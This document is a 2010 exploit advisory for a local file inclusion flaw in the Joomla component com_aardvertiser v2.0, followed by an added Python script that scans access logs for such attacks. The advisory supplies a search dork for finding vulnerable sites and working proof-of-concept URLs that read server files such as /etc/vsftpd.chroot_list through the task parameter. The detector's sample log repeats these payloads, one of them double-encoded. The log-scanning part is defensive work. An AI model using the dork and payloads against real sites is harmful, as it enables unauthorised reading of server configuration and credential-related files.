# Title : Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
# Published : 2010-05-13
# Author : eidelweiss


========================================================================
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
========================================================================

>> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site            : Inj3ct0r.com
[+] Support e-mail  : submit[at]inj3ct0r.com

I'm eidelweiss member from Inj3ct0r Team

Download:	http://sourceforge.net/projects/aardvertiser/files/

Author:		eidelweiss
Contact:		eidelweiss[at]cyberservices.com
Thank`s:		r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
Greetz: 		all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

-=[Description]=-

A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality. 


	-=[Dork]=-

	inurl:/index.php?option=com_aardvertiser

	-=[Exploit]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
	http://localhost/index.php?option=com_aardvertiser&task= [lfi]

	-=[LFI]=-

	/etc/vsftpd.chroot_list
	/usr/local/etc/apache/vhosts.conf

	-=[ P0C ]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
	http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================
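
Added example (not part of the original advisory or the component's code): a Python check for web-server access logs that flags com_aardvertiser requests whose task parameter decodes to a file path, the pattern shown in the PoC above. The log lines, IP addresses, the benign task=display value and the SAFE_TASK pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate Joomla task is a short controller/method name.
SAFE_TASK = re.compile(r"[A-Za-z0-9_.]{1,64}")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, hypothetical benign task).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/May/2010:10:00:00 +0000] "GET /index.php?option=com_aardvertiser&task=display HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/May/2010:10:00:05 +0000] "GET /index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list HTTP/1.1" 200 312',
    '198.51.100.7 - - [13/May/2010:10:00:09 +0000] "GET /index.php?option=com_aardvertiser&cat_name=conf&task=%252fusr%252flocal%252fetc%252fapache%252fvhosts.conf HTTP/1.1" 200 2048',
    '192.0.2.10 - - [13/May/2010:10:00:12 +0000] "GET /index.php?option=com_content&task=/etc/vsftpd.chroot_list HTTP/1.1" 404 0',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252f -> %2f -> /)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_task(url):
    """Return the decoded task if the request targets com_aardvertiser with a
    task that does not look like a plain task name, else None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_aardvertiser" not in query.get("option", []):
        return None
    for raw in query.get("task", []):
        task = fully_decode(raw)  # parse_qs has already decoded one layer
        if task and (".." in task or not SAFE_TASK.fullmatch(task)):
            return task
    return None

def scan_access_log(lines):
    """Yield (client_ip, decoded_task) for each flagged combined-log line."""
    for line in lines:
        m = REQUEST.match(line)
        if m:
            task = suspicious_task(m.group(2))
            if task is not None:
                yield m.group(1), task

if __name__ == "__main__":
    for ip, task in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested com_aardvertiser with task={task!r}")
```
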